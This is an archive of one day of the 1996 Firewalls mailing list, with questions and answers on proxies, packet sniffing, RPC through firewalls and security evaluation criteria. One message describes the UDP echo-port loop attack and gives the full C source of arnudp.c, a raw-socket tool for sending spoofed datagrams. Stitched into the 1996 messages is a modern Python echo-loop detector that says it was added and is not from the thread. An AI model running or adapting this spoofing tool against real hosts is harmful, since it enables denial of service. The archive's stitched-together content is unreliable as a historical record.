chris, if you get an order from a certain company, you owe me one ;-) From firewalls-owner Mon Feb 5 06:38:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA12209 for firewalls-outgoing; Mon, 5 Feb 1996 06:29:51 -0800 (PST) Received: from melita.melita.com (melita.melita.com [192.68.22.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA12195 for ; Mon, 5 Feb 1996 06:29:46 -0800 (PST) Received: from melupl.melita.com (melupl.melita.com [10.168.27.12]) by melita.melita.com (8.6.12/8.6.9) with SMTP id JAA12044 for ; Mon, 5 Feb 1996 09:28:17 -0500 Received: by melupl.melita.com (AIX 3.2/UCB 5.64/4.03) id AA62595; Mon, 5 Feb 1996 09:28:51 -0500 From: davek@melupl.melita.com (Dave Kennedy) Message-Id: <9602051428.AA62595@melupl.melita.com> Subject: I-Phone - safe? What ports? To: firewalls@greatcircle.com Date: Mon, 5 Feb 1996 09:28:51 -0500 (EST) Reply-To: davek@melita.com (Dave Kennedy) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm being asked to investigate proxying I-Phone (Internet Phone) traffic. This product allows voice conversations to happen over the Net. How safe or unsafe this is? Is it TCP or UDP? What ports does it use? Will plug-gw work? Thanks. 
-- | Dave Kennedy (davek@melita.com) Voice: 770-409-4575 | From firewalls-owner Mon Feb 5 07:24:08 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA13352 for firewalls-outgoing; Mon, 5 Feb 1996 07:03:51 -0800 (PST) Received: from dcb01a.cwi.net (dcb01a.cwi.net [205.136.1.65]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA13347 for ; Mon, 5 Feb 1996 07:03:43 -0800 (PST) Received: (from chris@localhost) by dcb01a.cwi.net (8.6.9/8.6.9) id KAA15257; Mon, 5 Feb 1996 10:02:44 -0500 Date: Mon, 5 Feb 1996 10:02:44 -0500 From: Chris Eastman Subject: Re: PC based sniffer To: Tony Ferro cc: firewalls@GreatCircle.COM In-Reply-To: <199602042120.QAA11458@raptor1.raptor.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk tcpdump has options for sniffing ppp and/or slip streams. --chris %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% Christopher Eastman %% Cable & Wireless, Inc %% %% MDS Network Engineer %% 1919 Gallows Road %% %% chris@cwi.net %% Vienna, VA 22182 %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% From firewalls-owner Mon Feb 5 07:38:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA13343 for firewalls-outgoing; Mon, 5 Feb 1996 07:03:35 -0800 (PST) Received: from alcatel.fr (mail.alcatel-alsthom.fr [193.104.30.131]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA13338 for ; Mon, 5 Feb 1996 07:03:29 -0800 (PST) Received: from alcatel.fr (gatekeeper-ssn.alcatel.fr [155.132.180.241]) by mailgate.alcatel.fr (8.7.3/8.7.3) with ESMTP id QAA10049 for ; Mon, 5 Feb 1996 16:03:11 +0100 Received: from AHQP14 (ahqp14.ahqps.alcatel.fr [155.132.120.211]) by nsfhh5.alcatel.fr (8.7.3/8.7.3) with SMTP id QAA04444 for ; Mon, 5 Feb 1996 16:04:03 +0100 (MET) Message-Id: <199602051504.QAA04444@nsfhh5.alcatel.fr> Comments: Authenticated 
From: "Kare Presttun"
Organization: Alcanet International
Date: Mon, 5 Feb 1996 16:06:45 +0100
To: Firewalls@GreatCircle.COM
Subject: SESAME

Hi, all,

The source code for SESAME distributed systems security is now available as of today via:

http://www.esat.kuleuven.ac.be/cosic/sesame.html

Good luck.

Kare
----------------------------------------------------------
| Kare Presttun                   Alcanet International  |
| Tel: +33 1 4058 5614            33, rue Emeriau        |
| Fax: +33 1 4058 5945            F-75015 Paris          |
| Kare.Presttun@ansf.alcatel.fr   FRANCE                 |
----------------------------------------------------------

From firewalls-owner Mon Feb 5 08:12:37 1996
From: Frederick M Avolio
Date: Mon, 05 Feb 1996 10:13:06 -0500
To: bressen@hks.net (Andrew K. Bressen), firewalls@bb.hks.net
Subject: Re: Firewall API's

This is a good idea, and one that I will stick into our product requirements list. A benefit to providing source code is that customers can create proxies based on, or by looking at, other proxies. Customers of ours have done this. But an API is a good idea.

Fred

At 04:49 AM 2/5/96 -0500, Andrew K. Bressen wrote:
>In article <256176126.339531179@va.arca.com>,
>Jeff Williams wrote:
>>We're wondering whether or not it is common practice to provide an API so
>>that we can create our own proxy applications if we want to. At least one
>>vendor has said "No way".
>
>well, TIS Gauntlet (and FWTK) has a "plug-board" proxy that can be used
>to proxy a given TCP port (or maybe even port pair).
>
>you could also look into SOCKS.
>
>I'm not sure what the status of skronk and gssapi are, or if they
>could be applied to this problem.
>
>>Is it reasonable to expect such an API with a firewall product? What's the
>>best way to find out which ones do or do not?
>
>reasonable, sure. realistic, I dunno.
>many firewall vendors wish to give out as little info as possible
>about the innards of their systems, and users adding things to
>those systems is generally not supported.
>
>

From firewalls-owner Mon Feb 5 08:16:31 1996
From: gblolmxb@ibmmail.com
Date: Mon, 05 Feb 1996 10:45:01 EST
To: firewalls@greatcircle.com
Subject: WWW Proxy

I know about telnet & ftp proxies that will allow internal users to log on to a firewall and access the internet, thus allowing us to continue using static routing only on our routers (we would only need to add one more, for the firewall's 'inside' address).

Does such a proxy exist for WWW so that:

1. Users can use whichever browsers they like.
2. The 'standard' winsock.dll, such as provided by FTP with their Onnet product, can still be used.

If so, which commercial firewalls support this?

Mark
gblolmxb@ibmmail.com

From firewalls-owner Mon Feb 5 08:48:06 1996
From: Chris Kostick
Date: Mon, 5 Feb 1996 11:29:21 -0500
To: Tony Ferro
Cc: firewalls@GreatCircle.COM
Subject: RE: PC based sniffer

I use version 3.0.2 to examine my PPP link. I happen to run it under Linux.

-- chris

> tcpdump has options for sniffing ppp and/or slip streams.
From firewalls-owner Mon Feb 5 09:24:39 1996
From: William Bradley Paris (Volt Comp)
Date: Mon, 5 Feb 96 09:00:51 TZ
To: firewalls@GreatCircle.COM, firewalls-owner@greatcircle.com
Subject: Re: PC based sniffer

Microsoft has an NDIS-based sniffer that works on WFW, W'95 and NT by the name of Network Monitor. It does not exist as a separate product, but is available through premier support or bundled with SMS server. It can sniff and parse your PPP and SLIP connections under W'95 & NT.

Thx - brad

The information and opinions in this message, real or imaginary, are my own and do not reflect those of my employer, Microsoft or other rational entities.

----------
| From: Tony Ferro
| To:
| Subject: Re: PC based sniffer
| Date: Sunday, February 04, 1996 4:20PM
|
| Hi Folks,
|
| I've seen responses for ethernet sniffers, is there any software available
| for sniffing your SLIP/PPP dial connection? I'm using ShivaPPP ndis dialer
| and its trace features are pretty limited - can count IP pkts, but can't
| see inside them.
|
| TIA,
| Tony
|

From firewalls-owner Mon Feb 5 09:42:58 1996
From: Chris Eastman
Date: Mon, 5 Feb 1996 12:34:52 -0500
To: firewalls@greatcircle.com
Subject: slip/ppp sniffing

Supposedly lanl has finished up watcher; I was told it has plenty of options for monitoring ppp/slip connections. Has watcher gone commercial, or is there a PD version out there somewhere?

--chris

From firewalls-owner Mon Feb 5 09:53:50 1996
From: Sick Puppy
Date: Mon, 5 Feb 1996 12:40:05 -0500 (EST)
To: firewalls@GreatCircle.com
Subject: Need a few pointers

My hind brain keeps telling my forebrain that somewhere it read that Windows 95 and Windows NT have been banned on some networks because of the problems they created when connecting to other operating systems. Could some kind soul e-mail me pointers to articles or postings on this subject, please?
Sick Puppy, tCDE
cDm

From firewalls-owner Mon Feb 5 10:24:10 1996
From: Jose Roberto Menezes Monteiro
Date: Mon, 5 Feb 1996 15:25:29 -0200
To: Firewalls@GreatCircle.COM
Subject: IP kernel variable of Solaris

Does anybody know a reference on the net where I could find information about all the IP kernel variables of Solaris?

TIA,

From firewalls-owner Mon Feb 5 10:49:23 1996
From: Brian Murrell
Date: Mon, 5 Feb 1996 09:29:19 -0800 (PST)
To: chris@cwi.net
Cc: tferro@raptor.com, firewalls@GreatCircle.COM
Subject: Re[2]: PC based sniffer

Chris Eastman wrote:
> tcpdump has options for sniffing ppp and/or slip streams.
>

Yeah right. The support is pretty crude. I've been extending the support for PPP as I find time. The real hard part is how do you actually get the data stream to use tcpdump on??

b.

--
Brian J. Murrell                  murrell@bctel.net
BCTel Advanced Communications     brian@ilinx.com
Vancouver, B.C.                   brian@wimsey.com
604 454 5261

From firewalls-owner Mon Feb 5 10:49:56 1996
From: sandy bryant
Date: Mon, 5 Feb 1996 13:28:41 -0500
To: Sick Puppy, firewalls@GreatCircle.COM
Subject: Re: Need a few pointers

At 12:40 PM 2/5/96 -0500, Sick Puppy wrote:
>My hind brain keeps telling my forebrain that somewhere it read that
>Windows 95 and Windows NT have been banned on some networks because of the
>problems they created when connecting to other operating systems. Could
>some kind soul e-mail me pointers to articles or postings on this subject,
>please?
>
> Sick Puppy, tCDE
> cDm
>

Maybe you're thinking of the problem Novell networks had with Windows 95? Since Windows 95 answers the Netware client GetNearestServer call with a packet claiming to be a Netware server, it can seriously confuse Netware clients if there is no other server on the LAN - the client will time out trying to log into the 95 machine (after all, it said it was a server...) and then fail.
Even if there is a true server on the network, some clients will still get the 95 packet first. Don't know if this has been fixed yet.

sandy bryant
kesmai corp.
sandy@kesmai.com

From firewalls-owner Mon Feb 5 10:50:14 1996
From: Chris Woods
Date: Mon, 5 Feb 1996 13:16:02 -0500 (EST)
To: gblolmxb@ibmmail.com
Cc: firewalls@GreatCircle.COM
Subject: Re: WWW Proxy

On Mon, 5 Feb 1996 gblolmxb@ibmmail.com wrote:
> to add one more, for the firewall's 'inside' address). Does such a proxy
> exist for WWW so that:
>
> 1. Users can use whichever browsers they like.
> 2. The 'standard' winsock.dll, such as provided by FTP with their
> Onnet product, can still be used.

In many situations when an http proxy is required, I install CERN's httpd and run it in caching-proxy mode. I set it up to listen to a port, and simply point all http, ftp, and gopher requests at that port. Note that the clients in question must support the ability to specify a proxy host for these connections. In most cases, our clients are using Netscape for all outgoing Internet usage, including mail, http, ftp, and gopher (how often do we really see gopher servers these days?).

> If so, which commercial firewalls support this?

I have this in place with TIS' fwtk. I simply don't use the http-gw that came with the fwtk, and use CERN's instead.

Chris Woods                Systems Administrator
cjwoods@paladin.com        Paladin Computing Solutions
617-273-4226               http://www.paladin.com/chris/
Want the government to control what you are allowed to read and see? "Why, NO!", you say? See http://www.eff.org/blueribbon.html

From firewalls-owner Mon Feb 5 11:23:38 1996
From: Juan Carlos Machado
Date: Mon, 5 Feb 1996 14:06:41 -0300 (WDT)
To: firewalls@greatcircle.com
Subject: CISCO Access Server Configuration

Hello,

We have a CISCO Access Server 2511 that provides Home Access to the Internet. I find that only the PPP connections are registered in the TACACS wtmp file. We want to do the same with the simple TELNET connections. Does anybody know how?

Thanks a lot for your help.

PS: excuse my poor English.

_________________________________________________________
Juan Carlos Machado Z.        jmachado@ciat.cgiar.org
Network Support               j.machado@cgnet.com
Voice Ph#: (57-2)4450-691
CIAT (International Center for Tropical Agriculture)
Cali - Valle - Colombia.
Phone: 4450000
JK:= NOT(reflect(opinions' self,opinions' employer));

From firewalls-owner Mon Feb 5 11:25:23 1996
From: "Richard Giering Jr."
Date: 5 Feb 96 12:39:39
To: firewalls
Subject: RPC Across a firewall?

I know the kind of reaction I'm liable to get but I said I'd check into it....

We have developers who are writing apps based upon RPC and demanding that RPC be opened on the firewall. The idea is to enable users with their own Internet provider to be able to access internal applications using RPC/client-server apps. I have some concerns listed below. Can anyone think of any more?

1) RPC runs on UDP (right?) and UDP opens a whole other bag of worms
2) RPC and portmapper are hard if not impossible to proxy.
3) RPC is insecure
4) portmapper has many known security holes.

My reaction has been "if they want to dialup, we'll setup internal modems"

Is anyone aware of firewall products that allow and protect RPC?

Rick Giering, Firewall Ranger
CCH Inc.
From firewalls-owner Mon Feb 5 11:26:52 1996
From: Andrew Cameron
Date: Mon, 5 Feb 1996 20:52:09 +0200 (GMT+0200)
To: Firewalls@GreatCircle.COM
Subject: Re: Echo Vunerebility

I noticed someone mentioning the echo port. My advice is to disable the echo service completely. It is often used by hackers to hang a computer. Try sending a packet from port 7 your ip to port 7 your ip. The system will bounce the packet back and forth slowing the system drastically.

A Hacker Program I have seen used to do this is called arnudp.c

---------------------------Cut Here---------------------------------------
/************************************************************************/
/* arnudp.c version 0.01 by Arny - cs6171@scitsc.wlv.ac.uk              */
/* Sends a single udp datagram with the source/destination address/port */
/* set to whatever you want. Unfortunately Linux 1.2 and SunOS 4.1      */
/* don't seem to have the IP_HDRINCL option, so the source address will */
/* be set to the real address. It does however work ok on SunOS 5.4.    */
/* Should compile fine with just an ANSI compiler (such as gcc) under   */
/* Linux and SunOS 4.1, but with SunOS 5.4 you have to specify extra    */
/* libraries on the command line:                                       */
/* /usr/ucb/cc -o arnudp arnudp001.c -lsocket -lnsl                     */
/* I'll state the obvious - this needs to be run as root! Do not use    */
/* this program unless you know what you are doing, as it is possible   */
/* that you could confuse parts of your network / internet.             */
/* (c) 1995 Arny - I accept no responsibility for anything this does.   */
/************************************************************************/
/* I used the source of traceroute as an example while writing this.    */
/* Many thanks to Dan Egnor (egnor@ugcs.caltech.edu) and Rich Stevens   */
/* for pointing me in the right direction.                              */
/************************************************************************/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

struct sockaddr sa;

main(int argc,char **argv)
{
  int fd;
  int x=1;
  struct sockaddr_in *p;
  struct hostent *he;
  /* 20-byte IP header, 8-byte UDP header, 10-byte payload */
  u_char gram[38]=
  {
    0x45, 0x00, 0x00, 0x26,
    0x12, 0x34, 0x00, 0x00,
    0xFF, 0x11, 0, 0,
    0, 0, 0, 0,
    0, 0, 0, 0,
    0, 0, 0, 0,
    0x00, 0x12, 0x00, 0x00,
    '1','2','3','4','5','6','7','8','9','0'
  };

  if(argc!=5)
  {
    fprintf(stderr,"usage: %s sourcename sourceport destinationname destinationport\n",*argv);
    exit(1);
  };

  if((he=gethostbyname(argv[1]))==NULL)
  {
    fprintf(stderr,"can't resolve source hostname\n");
    exit(1);
  };
  bcopy(*(he->h_addr_list),(gram+12),4);

  if((he=gethostbyname(argv[3]))==NULL)
  {
    fprintf(stderr,"can't resolve destination hostname\n");
    exit(1);
  };
  bcopy(*(he->h_addr_list),(gram+16),4);

  *(u_short*)(gram+20)=htons((u_short)atoi(argv[2]));
  *(u_short*)(gram+22)=htons((u_short)atoi(argv[4]));

  p=(struct sockaddr_in*)&sa;
  p->sin_family=AF_INET;
  bcopy(*(he->h_addr_list),&(p->sin_addr),sizeof(struct in_addr));

  if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))== -1)
  {
    perror("socket");
    exit(1);
  };

#ifdef IP_HDRINCL
  fprintf(stderr,"we have IP_HDRINCL :-)\n\n");
  if (setsockopt(fd,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0)
  {
    perror("setsockopt IP_HDRINCL");
    exit(1);
  };
#else
  fprintf(stderr,"we don't have IP_HDRINCL :-(\n\n");
#endif

  if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(struct sockaddr)))== -1)
  {
    perror("sendto");
    exit(1);
  };

  printf("datagram sent without error:");
  for(x=0;x<(sizeof(gram)/sizeof(u_char));x++)
  {
    if(!(x%4)) putchar('\n');
    printf("%02x",gram[x]);
  };
  putchar('\n');
}
----------------------------------------------------------------------------

From firewalls-owner Mon Feb 5 11:38:57 1996
From: "william.wells"
Date: Mon, 05 Feb 96 13:26:00 CST
To: FIREWALLS
Subject: Re: SSL and S-HTTP Proxy Status (as of 11 January 1996)

(Sorry for not crediting the original authors below - the multiple nested mail replies got confused by the time they got to me)

-- Writer 1 said:

So, I sympathize with the sentiment that TIS should either put some effort into maintaining fwtk, or release it so that a net-fwtk could be maintained by the user community.

Wait a minute -- are you asking TIS to keep spending money to keep giving you free firewalls?

-- Writer 2 said:

No I don't think that is what he is asking. I think that David was saying that if TIS isn't planning on doing anything further with the toolkit then why don't they release the code into the public domain or copy-left and let the community support it - after all it was (at least partly) developed under a DARPA contract at TAX PAYERS expense and should therefore belong to the TAX PAYERS and not TIS.

-- I say:

I'm not associated with TIS but I'd assume that the versions of fwtk that fall under the DARPA contract are relatively old and you probably don't want them. I'd assume that any version or update made after the contract is under their control. Personally, I don't find many companies giving away updated source, especially when they have a 'for sale' product.

William Wells
Manager, Technical Support
Damark International, Inc
william.wells@damark.com

From firewalls-owner Mon Feb 5 12:00:41 1996
From: Peter Morrissey
Organization: Syracuse University
Date: Mon, 05 Feb 1996 14:45:51 -0800
To: Firewalls@GreatCircle.COM
Subject: Novell inside IP Port?

Are there known TCP/UDP port(s) that support the tunneling of Novell inside IP? Someone recently set up such a tunnel and exposed all our Novell Servers to the Internet. I would like to prevent this from happening in the future.
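The echo-port loop Andrew Cameron describes a few messages above (a UDP datagram whose source and destination are both port 7, so each reply is echoed back again) is something a border filter or a capture sensor can recognise before the datagram ever reaches an echo daemon. The following Python is an added example, not code from this thread and not part of arnudp.c: it decodes an IPv4/UDP datagram with the same layout as the posted gram[] buffer (20-byte IP header, 8-byte UDP header, short payload), verifies the IP header checksum, and applies the defender-side checks. All sample datagrams and addresses are constructed here, using documentation ranges (192.0.2.0/24, 198.51.100.0/24) as placeholders.

```python
"""Decode a raw IPv4/UDP datagram and flag echo-to-echo reflection loops.

Added example, not code from the thread or from arnudp.c. The layout it
parses is the one the posted gram[] buffer uses: 20-byte IPv4 header,
8-byte UDP header, 10-byte payload. All addresses below are constructed
placeholders from the documentation ranges (192.0.2.0/24, 198.51.100.0/24).
"""
import struct
from dataclasses import dataclass
from ipaddress import IPv4Address

ECHO_PORT = 7            # RFC 862 echo service, UDP and TCP
PROTO_UDP = 17
IP_HDR = "!BBHHHBBH4s4s"  # ver/ihl, tos, len, id, flags/frag, ttl, proto, csum, src, dst
UDP_HDR = "!HHHH"         # sport, dport, length, csum


@dataclass(frozen=True)
class Datagram:
    total_length: int
    ttl: int
    src: str
    dst: str
    sport: int
    dport: int
    payload: bytes
    ip_checksum_ok: bool


def ones_complement_sum(data: bytes) -> int:
    """16-bit ones' complement sum as used by the IP header checksum (RFC 1071)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def parse_ipv4_udp(buf: bytes) -> Datagram:
    """Strictly decode IPv4+UDP; any length or version mismatch is an error, not a guess."""
    if len(buf) < 20:
        raise ValueError("truncated IPv4 header")
    ver_ihl, _tos, total_len, _id, _frag, ttl, proto, _csum, src, dst = struct.unpack(IP_HDR, buf[:20])
    if ver_ihl >> 4 != 4:
        raise ValueError("not IPv4")
    ihl = (ver_ihl & 0x0F) * 4
    if ihl < 20 or len(buf) < ihl + 8:
        raise ValueError("truncated IP options or UDP header")
    if proto != PROTO_UDP:
        raise ValueError("not UDP (protocol %d)" % proto)
    sport, dport, ulen, _ucsum = struct.unpack(UDP_HDR, buf[ihl:ihl + 8])
    if ulen < 8 or ihl + ulen > len(buf):
        raise ValueError("UDP length field inconsistent with datagram")
    # A header with a valid checksum sums (checksum field included) to all ones.
    csum_ok = ones_complement_sum(buf[:ihl]) == 0xFFFF
    return Datagram(total_len, ttl, str(IPv4Address(src)), str(IPv4Address(dst)),
                    sport, dport, buf[ihl + 8:ihl + ulen], csum_ok)


def echo_loop_findings(d: Datagram) -> list:
    """Checks a border filter or sensor can apply before a datagram reaches the echo daemon."""
    findings = []
    if d.sport == ECHO_PORT and d.dport == ECHO_PORT:
        findings.append("echo->echo: every reply is echoed back, one datagram loops indefinitely")
    if d.src == d.dst:
        findings.append("source equals destination: self-addressed datagram, source is forged")
    if not d.ip_checksum_ok:
        findings.append("IP header checksum does not verify")
    return findings


def build_sample(src: str, dst: str, sport: int, dport: int, payload: bytes = b"1234567890") -> bytes:
    """Constructed test fixture laid out like gram[] in arnudp.c (checksums left zero, as there)."""
    udp = struct.pack(UDP_HDR, sport, dport, 8 + len(payload), 0) + payload
    ip = struct.pack(IP_HDR, 0x45, 0, 20 + len(udp), 0x1234, 0, 255, PROTO_UDP, 0,
                     IPv4Address(src).packed, IPv4Address(dst).packed)
    return ip + udp


def fill_ip_checksum(buf: bytes) -> bytes:
    """Return a copy with a correct IPv4 header checksum, as a sending stack would emit."""
    ihl = (buf[0] & 0x0F) * 4
    header = bytearray(buf[:ihl])
    header[10:12] = b"\x00\x00"
    header[10:12] = struct.pack("!H", (~ones_complement_sum(bytes(header))) & 0xFFFF)
    return bytes(header) + buf[ihl:]


if __name__ == "__main__":
    samples = (
        ("self-addressed echo loop", build_sample("192.0.2.10", "192.0.2.10", 7, 7)),
        ("ordinary DNS query", fill_ip_checksum(build_sample("192.0.2.10", "198.51.100.5", 40000, 53, b"q"))),
    )
    for label, raw in samples:
        d = parse_ipv4_udp(raw)
        print("%s: %s:%d -> %s:%d len=%d findings=%s"
              % (label, d.src, d.sport, d.dst, d.dport, d.total_length, echo_loop_findings(d)))
```

The parser refuses rather than guesses on inconsistent lengths, because a filter that silently accepts a malformed header is itself a target. The port-7-to-port-7 rule is the one that matters for the loop in the message; the source-equals-destination rule catches the self-addressed variant, and the checksum rule is a cheap hint that the header was hand-built, though a real sending stack often fills it in, so it is a hint and not proof.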
From firewalls-owner Mon Feb 5 13:15:53 1996
From: "KM"
Date: Mon, 5 Feb 96 15:35:46 -0500
To: firewalls@GreatCircle.COM
Subject: Re: Mandatory protection (was: product selection)

In message <9602021404.AA18008@mordred.sware.com> Charles Watt writes:
> Fine. You've got a nice system. Its use of TE-based MAC gives it some
> definite competitive advantages over those systems that do not use MAC,
> if integrated and administered properly. But TE provides no advantage
> over a similar system based on MAC, such as the Harris firewall. There
> you must compete based upon other features, such as better application
> support or ease of administration.

Or portability.

Karen Goertzel
Manager, International Programmes and Special Projects
Secure Systems and Services Operation
Wang Federal, Inc.
7900 Westpark Drive - MS 700
McLean, Virginia 22102-4299
TEL: 703-827 3914   FAX: 703-827 3161
goertzek@wangfed.com
http://www.wangfed.com
+------------------------------+
| It infuriates me to be wrong |
| when I know I'm right.       |
|                  -- Moliere  |
+------------------------------+

From firewalls-owner Mon Feb 5 13:23:40 1996
From: "KM"
Date: Mon, 5 Feb 96 15:31:09 -0500
To: firewalls@GreatCircle.COM
Subject: Re: What are MLS and TE?

More accurately (unless you're interested in the Sterling Software homepage), the URL for TSIG is:

http://ftp.sterling.com/tsig/tsig.html

In message <199602012215.QAA01008@sparc14.cs.uiuc.edu> writes:
>
> I also recommend looking at the TSIG pages at http://www.sterling.com

Karen Goertzel

From firewalls-owner Mon Feb 5 13:38:36 1996
From: "KM"
Date: Mon, 5 Feb 96 15:27:57 -0500
To: firewalls@GreatCircle.COM
Subject: Re: What are MLS and TE?

Given the original requestor is in Brazil, I would suggest taking a slightly less parochial view of the important Criteria and Guidances pertaining to MLS computing. It is quite likely that a Brazilian firm would be more interested in the Information Technology Security Evaluation Criteria (ITSEC) than in the TCSEC. Therefore, I also refer Ms. Ferreira Cunha to the following URL, which is the complete text of the ITSEC criteria:

http://first.org/secpubs/itsec.txt

Also at:

http://www.raptor.com/library/itsec.txt

You can also find the TCSEC (and related Rainbow books) online if you access a number of URLs. Between them, Raptor and SAIC have a number of the books covered, though by no means all.
http://www.raptor.com/library/std001.txt
http://www.raptor.com/library/std002.txt
http://www.raptor.com/library/std003.txt
http://www.raptor.com/library/std004.txt

Also look at:

http://mls.saic.com/papers/orange.txt
http://mls.saic.com/papers/trusted_config.txt
http://mls.saic.com/papers/trusted_dac.txt
http://mls.saic.com/papers/trusted_manag.txt
http://mls.saic.com/papers/trusted_dist.txt
http://mls.saic.com/papers/trusted_audit.txt

and

http://www.cs.cmu.edu/afs/cs.cmu.edu/user/bsy/security/CSC-STD-001-83.txt

For a good overview of MLS, please check out the Defense Information Systems Agency's URL on "MLS: The Basics":

http://www.disa.mil/MLS/info/basics/sec0.html

Karen Goertzel
Manager, International Programmes and Special Projects
Secure Systems and Services Operation
Wang Federal, Inc.
7900 Westpark Drive - MS 700
McLean, Virginia 22102-4299
TEL: 703-827 3914
FAX: 703-827 3161
goertzek@wangfed.com
http://www.wangfed.com
+------------------------------+
| It infuriates me to be wrong |
| when I know I'm right.       |
|                   -- Moliere |
+------------------------------+

From firewalls-owner Mon Feb 5 13:54:02 1996
Date: Mon, 5 Feb 1996 16:32:39 -0500 (EST)
From: Tom Cooper
To: firewalls@greatcircle.com
Subject: SQL*Net proxy?

Has anyone successfully configured a proxy for outbound/inbound SQL*Net transactions?
In my observations, Unix to Unix server communications take place on a designated port, but PC to Unix communications switch port numbers after about 20-25 packets. The PC always sends to the designated port, but the Unix server changes to a different port. This makes filtering difficult.

Thanks

From firewalls-owner Mon Feb 5 14:26:07 1996
Date: Mon, 5 Feb 96 15:58:31 -0500
From: "KM"
To: Dan_Vukelich@qmgateib.mitre.org, firewalls@GreatCircle.COM
Subject: Re: Survey

In message "Dan Vukelich" writes:

> First, I'm looking for is an independent study of firewall products, with
> columns such as "provides packet filtering," "supports IPX," etc.

There are a few you should look up:

NETWORK WORLD ran a survey of 13 different firewall products (January 29, 1996 issue).

DATA COMMUNICATIONS ran a Lab Test of firewalls in its November 21, 1995 issue. Check out the DC URL:

http://www.data.com/Lab_Tests/Firewalls.html

In 1995, the Computer Security Institute published a Firewall Product Matrix (Computer Security Journal, Vol. XI, No. 1, 1995). CSI's phone number is 415-905 2626 if you want to order a back issue.

INFOSECURITY NEWS ran its "Shopping for Firewalls" survey in 1995.
Unfortunately, my copy is a reprint, which has no specific issue date on it. (Magazines that print and distribute these reprints should take heed; it would be extremely helpful if you'd include the date of the issue in which they were printed!)

If anyone can help, please do.

Karen Goertzel
Manager, International Programmes and Special Projects
Secure Systems and Services Operation
Wang Federal, Inc.
7900 Westpark Drive - MS 700
McLean, Virginia 22102-4299
TEL: 703-827 3914
FAX: 703-827 3161
goertzek@wangfed.com
http://www.wangfed.com
+------------------------------+
| It infuriates me to be wrong |
| when I know I'm right.       |
|                   -- Moliere |
+------------------------------+

From firewalls-owner Mon Feb 5 14:27:26 1996
Date: Mon, 5 Feb 96 16:09:34 -0500
From: "KM"
To: firewalls@GreatCircle.COM
Subject: Re: Need a few pointers

In message Sick Puppy writes:

> My hind brain keeps telling my forebrain that somewhere it read that
> Windows 95 and Windows NT has been banned on some networks because of the
> problems they created when connecting to other operating systems.

There are other operating systems?
:)

Karen Goertzel
Manager, International Programmes and Special Projects
Secure Systems and Services Operation
Wang Federal, Inc.
7900 Westpark Drive - MS 700
McLean, Virginia 22102-4299
TEL: 703-827 3914
FAX: 703-827 3161
goertzek@wangfed.com
http://www.wangfed.com
+------------------------------+
| It infuriates me to be wrong |
| when I know I'm right.       |
|                   -- Moliere |
+------------------------------+

From firewalls-owner Mon Feb 5 14:30:51 1996
Date: Mon, 5 Feb 1996 15:44:39 -0600 (CST)
From: Mike Neuman
Reply-To: mcn@EnGarde.com
Organization: En Garde Systems--St. Louis, MO
To: chris@cwi.net
Cc: firewalls@greatcircle.com
Subject: Re: slip/ppp sniffing

chris@cwi.net writes:

> Supposedly lanl has finished up watcher, I was told it has plenty of
> options for monitoring ppp/slip connections. Has watcher gone
> commercial, or is there a PD version out there somewhere?

Amazing how rumors spread. :-) To correct this particular one:

1) IP-Watcher is a commercial product
2) I was once (several years ago) employed by LANL.
3) There really aren't any options for monitoring slip or ppp connections. It can "only" monitor TCP/IP connections, not raw serial data.

There is a public domain spin off called TTY-Watcher which monitors ttys on a single system. This could be extended to monitor PPP or SLIP connections to a single machine, but it doesn't currently do so.
For information on IP-Watcher:

http://www.engarde.com/software/ipwatcher

I presented a technical paper on IP-Watcher at the Computer Security Applications Conference in December. It's available from:

ftp://ftp.engarde.com/pub/IPWatcher_CSAC_Paper.ps.Z

Information on TTY-Watcher can be gotten through my company's home page:

http://www.engarde.com

-Mike Neuman
mcn@EnGarde.com
En Garde Systems
http://www.engarde.com/~mcn

From firewalls-owner Mon Feb 5 15:25:44 1996
Date: Mon, 5 Feb 1996 17:41:51 -0500 (EST)
From: Sick Puppy
To: firewalls@GreatCircle.com
Subject: Re: Need a few pointers
In-Reply-To: <199602052228.GAA19175@relay3.jaring.my>

There was a very good response to my query. I had no idea there were so many security problems and performance problems associated with WindBlows 95. Sounds like the operating system was written by a couple of drunken cats. In a couple of days I will get the responses together in one file, together with a couple of good web pointers, and pass it on to anyone who wants an e-mailed copy.
Sick Puppy, the Cat_Eating_Dawg

From firewalls-owner Mon Feb 5 15:35:04 1996
Date: Tue, 06 Feb 1996 09:51:53 +1000
From: rex@staff.cs.su.oz.au (Rex di Bona)
Reply-To: rex@cs.su.oz.au
To: gblolmxb@ibmmail.com
Cc: firewalls@GreatCircle.COM
Subject: www proxies

Every commercial firewall should support http/ftp/shttp proxies. If they don't they'll rapidly lose business. The web is overtaking e-mail as the main reason people want to connect to the web.

Rex.

> From: gblolmxb@ibmmail.com
>
> ---- Mail Item Text Follows
> Subject WWW Proxy
>
> I know about telnet & ftp proxies that will allow internal users to
> log on to a firewall and access the internet, thus allowing us to
> continue using static routing only on our routers (we would only need
> to add one more, for the firewalls 'inside' address). Does such a proxy
> exist for WWW so that:
>
> 1. Users can use whichever browsers they like.
> 2. The 'standard' winsock.dll, such as provided by FTP with their
> Onnet product, can still be used.
>
> If so, which commercial firewalls support this?
